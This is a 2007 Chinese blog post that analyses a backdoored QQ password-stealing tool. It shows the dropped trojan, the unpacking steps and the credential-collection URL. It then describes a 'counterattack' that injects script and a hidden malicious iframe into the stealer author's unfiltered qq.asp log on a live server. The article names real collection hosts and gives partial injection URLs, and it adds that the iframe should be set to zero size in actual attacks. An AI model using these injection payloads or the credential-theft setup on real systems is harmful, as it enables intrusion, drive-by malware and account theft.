QQ盜號軟件後門分析與反擊
2007-10-27 22:03:33
作者:fhod 小財 說明:文章已發表於***手冊07年10期,轉載請註明出處! 對明小子QQ密碼特工軟件的分析 ----小財 今天無聊給一朋友講解QQ盜取原理,從網上找了一個工具 “明小子QQ密碼特工”結果發現這個軟件有後門。下面就讓我帶着大家來分析一下。 首先我們用nod32來查一下有沒有毒。圖1 看到了吧沒有病毒。我們把監控打開在運行看看圖2 看到了吧 NOD32檢測到了病毒。爲了確認一下。我再用‘***輔助查找器’的文件監視功能來檢測下。 圖3 新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe 很明顯軟件本身在運行的同時釋放了一個123.exe 而NOD32查殺到的也就是這個文件。 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\ 接着我們用peid查下123.exe. 圖4 EP段.nsp1經常搞免殺的應該知道這是北斗加的殼,我們再看看區段vmp 圖5 這個一看就是用vmprotect做的免殺。至於123.exe是什麼***咱門就不繼續分析了。 接下來分析他生成後的文件是不是一樣令人擔憂。 隨便配置一個圖6 Ollydbg手工給他脫殼esp定律簡單 圖7 脫殼成功後我們在用PEID檢測下 圖8 我們再用c32asm對他進行反彙編,搜索asp圖9 看到了什麼 .剛纔我是默認設置的應該是[url]http://langyeqq.cn/qq/newbacka.asp[/url]" href="http://k.thec.cn/xieming/69q/qq.asp纔對。,怎麼會是[url]http://langyeqq.cn/qq/newbacka.asp[/url]" target=_blank>[url]http://k.thec.cn/xieming/69q/qq.asp[/url]纔對。,怎麼會是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 這個呢!我們瀏覽看看 圖10 "pzQQ"看到了吧,說明就是他的盜號的,從這些可以確定,這個軟件不但運行的時候施放一個***,而且就連我們配置好的文件也被他留了後門,而作者就坐等着收號了。 後門反擊戰 作者:fhod[E.S.T VIP] 看到這..想必大家也和我一樣非常氣憤..難道我們就任由作者下去嗎.當然不..現在我們就開始反擊. 我們來看看qq.asp的代碼 首先來看 strLogFile="Q7.txt" 這個是QQ接受文件..默認的是q7.txt 繼續看代碼 QQNumber=request("QQNumber") QQPassWord=request("QQPassWord") QQclub=request("QQclub") QQip=request("QQip") 是沒經過任何過濾的..這些參數的數據我們完全可以自定義 在往下看 if QQNumber="" or QQPassWord="" then response.write "pzQQ" response.end 假如QQNumber和QQPassWord的值爲空就返回pzQQ .然後程序結束工作.. 只要這兩個值不爲空就繼續執行下面的代碼 StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----會員:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST") StrLogText=StrLogText&")" 寫入q7.txt文件 格式爲 QQ號碼----QQ密碼----會員:----IP: 繼續看下面的代碼 set f=Server.CreateObject("scripting.filesystemobject") (沒有q7.txt這個文件就自動新建) set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0) ff.writeline(StrLogText) (打開q7.txt並寫入數據) 最後response.write "發送成功!" 滿足條件提示成功. 所有的代碼也就是這些..程序並未做任何過濾..和處理..也就是說..只要滿足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "發送成功!"的提示. [url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123[/url] 圖11 這就證明了QQNumber=123&QQPassWord=123這兩個我們是可以自己定義的..如果我們寫入的不是數字..而且一段腳本代碼呢?會不會執行呢..讓我們來試下 [url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]< ... quot;fhod")</script> 圖12 插入代碼成功...我們來看下 [url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什麼樣的.. 圖13 再次證明對提交的數據是無任何限制的...我們完全可以自己發揮想象.插入任何代碼都可以... 如果想反掛馬的話..我們就可以提交以下數據 [url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]<iframe%20&# ... 20width=480%20height=480></iframe> 圖14 當然我這裏把width和height設置爲480只是爲了方便演示..實際掛馬中要改爲0 好了..現在我們就可以給作者一個驚喜去了..圖15 本文出自 51CTO.COM技術博客 |